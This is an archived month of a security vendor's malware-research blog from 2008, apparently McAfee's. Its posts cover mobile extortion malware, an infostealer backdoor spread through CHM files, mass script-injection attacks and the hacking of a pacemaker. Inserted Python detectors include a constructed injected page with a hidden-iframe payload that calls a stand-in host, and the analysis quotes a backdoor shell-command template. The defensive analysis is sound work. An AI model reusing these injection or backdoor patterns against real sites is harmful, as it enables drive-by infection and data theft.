Archive for March, 2008

Crimeware goes Mobile

A week after McAfee Avert Labs found WinCE/InfoJack, we’ve run across more malware in China. This time the malware, running on Symbian Series 60 phones, attempts to extort money from users. SymbOS/Kiazha.A displays a message telling the user to send RMB 50 (approx. $7) to the malware author in order to regain use of the phone.

Figure 1
The warning message is displayed after a delay

The message roughly translated states:
“Warning: Your device has been affected, please prepare a recharge card of RMB 50 yuan and connect QQ[id removed] account, or your phone will be paralysed!!!”

QQ is a very popular Instant Messaging network in China and a target for many password stealing trojans and scams. QQ coins, an in-network currency, are also heavily used, traded and stolen outside the QQ network. We’ve covered how theft of QQ coins is prosecuted in the past.

SymbOS/Kiazha.A is just one part of SymbOS/MultDropper.CR. MultiDroppers bundle several different pieces of malware, each with its own functionality. SymbOS/MultDropper.CR consists of SymbOS/Commwarrior.C, SymbOS/Beselo.B1, and SymbOS/SmsSend.F-G, all of which can cost the user money through SMS and MMS transmission.

On the surface SymbOS/MultDropper.CR looks like a standard collection of previously seen malware. While examining the MultDropper’s components individually, we noticed a few things:

  • SymbOS/SmsSend.F sends an SMS to request a new QQ account for the user
  • SymbOS/SmsSend.G forwards SMS received to the malware author
  • SymbOS/Kiazha.A deletes any sent or received SMS message

Separately these actions seemed in opposition to each other. If the new account SMS were received, it would be deleted by SymbOS/Kiazha.A rendering the initial action moot.

Further testing with the entire package showed something more interesting: the interaction of these disparate components produces a single, functional piece of malware. SymbOS/MultDropper.CR uses malicious payloads (Beselo, Commwarrior) to convince the user that their phone is infected. It also sets up SMS forwarding (SmsSend.G) to collect information and potentially passwords. In case the victim doesn’t have a QQ account, the malware orders one for them (SmsSend.F). After all that, SymbOS/Kiazha.A deletes SMS messages to cover its tracks and displays the offer to fix the user’s phone for a small fee.

The interesting thing about MultiDroppers is that usually they’re compiled by malware authors who aren’t programmers and simply collect the work of others. With MultiDropper.CR it appears that the author, with a lot of effort and testing, put together various malware like pieces from a toolkit. Also of note, especially with mobile phone malware, is that the author may have put in all this work to make a profit rather than increase his notoriety.

Nuwar’s New Wave

After a series of holiday related campaigns, Nuwar (a.k.a. Storm) is back to its ecard routine. E-mails promising funny ecards are being spammed all over the Internet. The usual http://numeric-IP/ links inside lead to a page like this:

Nuwar

A click on the picture leads to a postcard.exe download, and a click on “click here” to an e-card.exe download. If nothing is clicked, an ecard.exe download starts automatically after five seconds. Needless to say, all of the files are Nuwar.

Does virus writing pay the mortgage?

There was recently an article discussing a talk given by Gene Hodges, on the sociological changes in the virus-writer scene. On the one hand, I think the concept is correct, there has been a very large shift in the sociological motivation behind authoring malware. One of the two conclusions he’s drawn, however, is contrary to facts.

You may recall from the other day’s blog entry that 17 people between the ages of 17 and 26 were arrested in Canada. Earlier that week another person “under the age of 18” was arrested for botnet-related activity. I don’t imagine that even teenagers who’re making so much money on botnets would be homeowners, as Hodges suggested.

It seems to me that kids are still what make the malware world go round - many seem to feel invincible, as if the law can’t touch them. Or perhaps they just “don’t know better”. These are kids who’ve grown up with technology, so cybercrime may seem as easy as taking candy from a baby. And there is still very little risk for them in these crimes. There are few prosecutions compared to the total number of individuals perpetrating these crimes, and these kids have no property or reputation to lose. A married adult with a mortgage, like the ones Hodges describes, might be concerned about losing the house they and a spouse are living in. A teenager, on the other hand, would be highly unlikely to have property in their name which could be confiscated.

In short, the stereotype of the kid in his parent’s basement still holds. But now maybe they can afford some flashy duds to attract the ladies when they’re not holed up in the basement stealing your data.

Microsoft OneCare incorrectly tagging SiteAdvisor; Solution in progress

Microsoft’s OneCare team issued an update on January 31, 2008 that resulted in SiteAdvisor users receiving a Microsoft warning message recommending that SiteAdvisor be removed due to interference with OneCare.

OneCare SiteAdvisor warning

SiteAdvisor doesn’t interfere with OneCare in any way; we communicated this to Microsoft and they’ve begun to resolve the issue.

As of February 21st, new installations of OneCare will not message against SiteAdvisor. However, existing users of OneCare will continue to receive these messages until sometime in the spring, when Microsoft says it will fix OneCare installations made prior to February 21.

Turns out that as a general rule, Microsoft recommends running only one security application at a time because of potential performance and “PC stability” issues. We explained to Microsoft that SiteAdvisor functionality is totally unrelated to OneCare. They agreed.

Rest assured, there is no need to disable SiteAdvisor or OneCare. The two products co-exist nicely (aside from the pop-up!).

Because OneCare doesn’t allow white listing of applications, affected consumers have limited options until all installations of OneCare are patched. Thanks for your patience during this time.

Microsoft Access Exploits Nothing New

Recently our friends from Pandalabs published a weblog post stating that a new Microsoft Access exploit has been found in the wild. We initiated some research on this exploit and found it actually targets an older, well-known vulnerability, CVE-2005-0944, found by the hexview team in March 2005. It’s very easy to exploit this vulnerability. We had observed similar exploits last year, and the dropper used in this case looks very similar to that one.

Microsoft considers MDB files to be unsafe, so a specific patch for this vulnerability has not been released since it was made public 3 years ago.

The interesting thing about this vulnerability is that it happens in msjet40.dll, which was never updated on a Windows XP SP2 since the release of MS04-014 (for other platforms, please check out http://support.microsoft.com/kb/239114).

In this specific case, the dropper uses a jump address in mswstr10.dll, which is part of the MS JET 4.0 engine package. So for XP SP2 users the trojan gets executed in almost all cases, no matter which version of Office XP or 2003 you are using. We tested Office 2007, 2003 and XP and found that only Office 2007 was immune to this vulnerability.

McAfee AV detects this recent exploit via DAT 5236 which was released February 22 and our IntruShield NIPS sensors can detect and block this by our generic protection signatures for MS Access “HTTP: Microsoft Jet DB Engine Buffer Overflow” released on November 13, 2007.

Since Microsoft doesn’t patch Access-related vulnerabilities, we highly recommend Office users never open untrusted MDB files.

Social engineering tricks use Tibet to lure victims

Recently, McAfee Avert Labs received a suspicious CHM file containing nineteen wonderful pictures from a National Geographic article by Tolstoy Ilia, titled “Across Tibet from India to China”. Other security companies seem fascinated by these pictures too.

Interestingly, we received another suspicious CHM file a week earlier, also containing some images related to Tibet, and more specifically about Tsering Chungtak who was crowned Miss Tibet 2006!

(Just to clarify: a CHM file is a compiled and compressed Microsoft HTML Help file that can contain formatted text but also documents, scripts and executable files.
When a CHM file is opened, the HTML Help viewer, called hh.exe and located in the Windows directory, extracts the compressed files and executes them, which is why CHM files are sometimes used maliciously.)

As the two cases looked similar (both drop a file named music.exe; both contained pictures related to Tibet), I decided to investigate them further and… bingo, both are linked to the same remote servers and involve the same family of malware (Spy-Agent.cp), which is a multi-part trojan composed of a loader, an infostealer, a backdoor component and an update installer.

Actually the file “music.exe” is just the first part of the puzzle - the figure below represents the attack architecture:

Although the CHM file will stay on the infected machine, music.exe will be deleted either by avp.exe (1st variant of the trojan) or by conime.exe (2nd variant). These two executable files also control the DLL loading.

The file zipfldr.dll (named the same as the file used in Windows’ built-in ZIP handling) is the infostealer component that stores data in two different files: C36YKNy.dat and C36YKNz.dat.

The former contains logs of when the execution of the dll started and stopped, the hostname and IP address of the machine, and the intercepted keystrokes. However the keystrokes will be written into the other logfile too.

The latter contains various data from the machine:

  • Microsoft Windows Version
  • Windows Environment Strings
  • MAC address
  • List of the active processes, their PPID and PID
  • Outlook Passwords
  • Hotmail Passwords
  • Deleted Outlook Account passwords
  • IE Password-Protected sites passwords
  • MSN Explorer Signup passwords
  • IE AutoComplete Passwords
  • IE Auto Complete Fields
  • Cached passwords
  • Keystrokes from the former logfile

These passwords are retrieved from the Protected Storage System Provider key and by enumerating the Protected Storage. To do that the malware doesn’t load pstorec.dll directly but instead copies the file to xactsrv.dll, located alongside the two .dat files. This newly created DLL is loaded and its exported function PStoreCreateInstance() is called, providing an instance of IPStore.

Additionally, the malware uses the WNetEnumCachedPasswords() function from MPR.dll to gather cached passwords – a common trait of infostealer Trojans!

Last but not least zipfldr.dll attempts to connect to a remote server chosen amongst a list of three IP addresses. If successful two further components are downloaded:

  1. setup.dat
  2. winzip.exe

The URL used doesn’t reference the executable files directly; instead, a server-side script receives a specific UID as the effective parameter. The parameter that means “let me get the other files please” is “DD01x51”.

As you can see below, the files are encoded in Base64 and they are enclosed between the tags “1401C4F9071401C4F92317”:

And as previously mentioned, the dll file is able to intercept keystrokes by installing a high-level keyboard hook (WH_KEYBOARD).

There is hardly anything to mention about winzip.exe (the malicious one, of course!), as it’s just an executable that looks for new files to install and sets up their required registry keys.

Setup.dat is the backdoor component. The control connection to the attacker’s machine is made by sending an HTTP request to the server-side script file again, this time passing UID “DDF03”.

The remote server to contact is chosen from a list of ten hardcoded IP addresses and URLs, which are also stored in the following registry key:

[HKCU\Software\Kodak\Imaging\Etc\]
“host%d”=host_to_contact (where %d is a digit).

It’s worth mentioning that the list of hosts may be updated by the attacker at any time by using a specific command.

Other commands available during remote control also include:

  • Hosts: to write a new host in the registry key quoted above.
  • Shell: to get a shell on the victim’s machine… (cmd.exe /c %s >> %s)
  • Quit: to close the backdoor. That results in the date and time being written to [HKCU\Software\Kodak\Imaging\Etc\] “Refresh”=local_date_and_time
  • Some others include Netget, Netmget, Netmgetr, Netls, Netlsr, Regls, Reglsr, Ls, Lsr, Get, Mget, which are used to obtain various pieces of information about the victim’s registry, read directory contents, download files to the victim’s machine, or to retrieve their files!
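For incident responders, the two persistence artefacts described above (the host%d list under HKCU\Software\Kodak\Imaging\Etc with its Refresh timestamp, and xactsrv.dll sitting next to C36YKNy.dat and C36YKNz.dat) are easy to hunt for offline. The following is an added example, not code from the original post or from McAfee: it triages a .reg export and a file listing collected from a suspect machine; the sample export and paths are constructed, and the hive name is written out in .reg form (HKEY_CURRENT_USER) rather than the HKCU shorthand used above.

```python
import re
import ntpath

# Constructed .reg export (not data from a real victim) showing the artefacts
# described in the post: host<digit> values and a Refresh timestamp written on Quit.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Kodak\Imaging\Etc]
"host0"="192.0.2.10"
"host1"="www.example.net/update.php"
"Refresh"="2008-03-05 14:22:31"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
'''

SUSPECT_KEY = r"HKEY_CURRENT_USER\Software\Kodak\Imaging\Etc"
# The three files zipfldr.dll keeps together in one directory (names from the post).
DROPPED_SET = {"xactsrv.dll", "c36ykny.dat", "c36yknz.dat"}


def parse_reg_export(text):
    """Parse a .reg export into {key: {value_name: data}} (string values only)."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            name, _, data = line.partition("=")
            keys[current][name.strip('"')] = data.strip('"')
    return keys


def triage_kodak_key(reg_text):
    """Return the stored C2 host list (in host0, host1, ... order) and the Refresh
    timestamp, or None when the key is absent from the export."""
    values = parse_reg_export(reg_text).get(SUSPECT_KEY)
    if values is None:
        return None
    hosts = sorted((int(n[4:]), v) for n, v in values.items()
                   if re.fullmatch(r"host\d+", n))
    return {"hosts": [v for _, v in hosts], "last_quit": values.get("Refresh")}


def find_dropped_set(paths):
    """Return directories (from a Windows file listing) that hold all three
    co-located infostealer artefacts; a partial match is not reported."""
    by_dir = {}
    for p in paths:
        d, name = ntpath.split(p)
        by_dir.setdefault(d, set()).add(name.lower())
    return sorted(d for d, names in by_dir.items() if DROPPED_SET <= names)
```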

The CHM files received were used in two targeted attacks, so this multi-part trojan is unlikely to be widely distributed, but I would not be surprised to find it for sale in underground forums…

Our detection includes all components of this malware as Spy-Agent.cp.dr!chm, Spy-Agent.cp.dr, Spy-Agent.cp.dll and Spy-Agent.cp, and of course we will still keep an eye out for similar attacks!!!

Another Mass Attack Underway

On the heels of recent iframe attacks, we’re currently tracking another mass compromise. This attack involves injecting script into valid web pages to include a reference to a malicious .JS file (sometimes in the BODY, other times in the TITLE section). The .JS file uses script to write an IFRAME, which loads an HTML file that attempts to exploit several vulnerabilities, including:

  • MS06-014
  • RealPlayer (ActiveX Control)
  • Baofeng Storm (ActiveX Control)
  • Xunlei Thunder DapPlayer (ActiveX Control)
  • Ourgame GLWorld GlobalLink Chat (ActiveX Control)

This is one of those cascading threats, where one page leads to another and another, which leads to an executable, which leads to another and another. At least one of the payload trojans targets online gamers.

Preliminary research results suggest more than 10,000 pages were affected by this hack attack.

Similar attacks were observed in the past; most notably, the infamous “Dolphin Stadium” (aka Super Bowl) attack was similar, and was later connected with SQL injection as the method the attackers used to inject their malicious code. In cases where the TITLE tag has been modified, the browser’s title bar will show the script reference:


Example of browser title bar (censored)
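Webmasters checking whether their own pages were hit by this kind of compromise can look for exactly the two symptoms described above: a script tag that landed inside the TITLE, and a .js reference pointing at a host the site does not own, followed by the second-stage script that writes an IFRAME. The following is an added example, not code from the original post or from McAfee; the page, the second-stage script and the host bad.example are constructed for illustration, and the site’s own hostnames are passed in by the caller.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptRefCollector(HTMLParser):
    """Record every <script src=...> together with the section it sits in."""
    def __init__(self):
        super().__init__()
        self.in_title = False
        self.in_body = False
        self.refs = []

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self.in_title = True
        elif tag == "body":
            self.in_body = True
        elif tag == "script":
            src = dict(attrs).get("src")
            if src:
                where = "title" if self.in_title else ("body" if self.in_body else "head")
                self.refs.append((src, where))

    def handle_endtag(self, tag):
        if tag == "title":
            self.in_title = False


def find_injected_scripts(html, own_hosts):
    """Flag script references matching the mass-compromise pattern: any script
    tag inside <title>, or a .js loaded from a host not in own_hosts."""
    c = ScriptRefCollector()
    c.feed(html)
    flagged = []
    for src, where in c.refs:
        host = (urlparse(src).hostname or "").lower()
        foreign_js = bool(host) and host not in own_hosts and src.lower().endswith(".js")
        if where == "title" or foreign_js:
            flagged.append({"src": src, "location": where})
    return flagged


# Matches document.write(...) whose argument carries an <iframe, whether the
# tag is literal, URL-encoded (%3Ciframe) or JS-escaped (\x3ciframe).
IFRAME_WRITER = re.compile(r"document\.write\s*\(.*?(?:<|%3c|\\x3c)iframe", re.I | re.S)


def js_writes_iframe(js_text):
    """True if the script writes an IFRAME into the page (the second stage)."""
    return IFRAME_WRITER.search(js_text) is not None


# Constructed sample page: /js/site.js is the site's own; the references to
# bad.example stand in for the injected ones (one in TITLE, one in BODY).
SAMPLE_PAGE = """<html><head>
<title>Forum home<script src="http://bad.example/x.js"></script></title>
<script src="/js/site.js"></script>
</head><body><p>Welcome</p>
<script src="http://bad.example/x.js"></script>
</body></html>"""
SAMPLE_JS = 'document.write(unescape("%3Ciframe src=\\"http://bad.example/e.htm\\" width=0 height=0%3E"));'
```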

McAfee’s designations for the various pieces of malware include:

  • Downloader-BGX
  • Exploit-RealPlay
  • JS/Exploit-BO.gen
  • VBS/Psyme

Analysis is ongoing.

It’s Time for your update Mr. Brown… Hacking the Human

Straight out of science fiction? Sounds like it, but it may be closer to reality than you would think.

Recently a bunch of researchers from the University of Washington and the University of Massachusetts (plus a Harvard MD and a University of Washington PhD) were able to hack a pacemaker/defibrillator.

Think about this for a moment…they were able to make the device stop.

They released the report on their Web site dedicated to medical device security. Very interesting stuff.

Under the hood (so to speak – it was actually on a table) they found that they were able to connect to the device wirelessly, and cause it to shock on command and even to stop altogether. Almost secondary at this point, they were also able to glean sensitive patient information stored on the device.

Exploit scenarios for this are better left to more deviant-minded individuals, but the net effect is obviously very serious. (When’s the last time your server went post-mortem - literally - from a flaw?)

So here’s the coolest part to the story:

They have examples of how to fix it! How many times have you seen a researcher release details of an exploit and not suggest how to fix it (aye, irresponsible disclosure)? They have taken account of the device designs (wireless transmission) and limitations (battery power) and have suggested ways that device makers could improve the security. Kudos to them! Hopefully this will spark a growing industry to make these devices safer.

One last thought here… would it not be surreal if a computer virus transcended the electronic world and actually infected a human being?

Follow Up To Yesterday’s Mass Hack Attack

Yesterday we uncovered a newer mass hack affecting over 10,000 web pages. That number has since doubled. Today, I took a look at another recent mass attack, which was similar to those reported by Dancho Danchev, but references a JS file rather than an IFRAME.

The attack seems to have started more than a week ago, and nearly 200,000 web pages have been found to be compromised, most of which are running phpBB. This contrasts with yesterday’s attack, in which the vast majority of the affected pages were Active Server Pages (.ASP). The ASP attacks differ from the phpBB ones in both payload and method: various exploits are used in the ASP attacks, whereas the phpBB ones rely on social engineering. phpBB mass hacks have occurred in the past, including those done by the Perl/Santy.worm back in 2004.

Here’s a brief video demonstrating how the phpBB attack looks from the end user’s perspective.

Security Economics Report at ENISA

I came across a report entitled “Security Economics and the Internal Market,” published on the Web site of the European Network and Information Security Agency (ENISA) by Ross Anderson, Rainer Böhme, Richard Clayton, and Tyler Moore. The authors are well-known academics and security experts in Europe.

The report is a staggering 114 pages long, gives us some light reading for the weekend (no, no), and makes some important recommendations for the creation of European Union regulations informed by information-security economics. But the research behind these recommendations may have relevance in any country or region. Two recommendations of note to vulnerability research types:

  • “We recommend that the EU adopt a combination of early responsible vulnerability disclosure and vendor liability for unpatched software to speed the patch-development cycle.”
  • “We recommend security patches be offered for free, and that patches be kept separate from feature updates.”

Read the report for some in-depth analysis of security economics. Neat stuff indeed.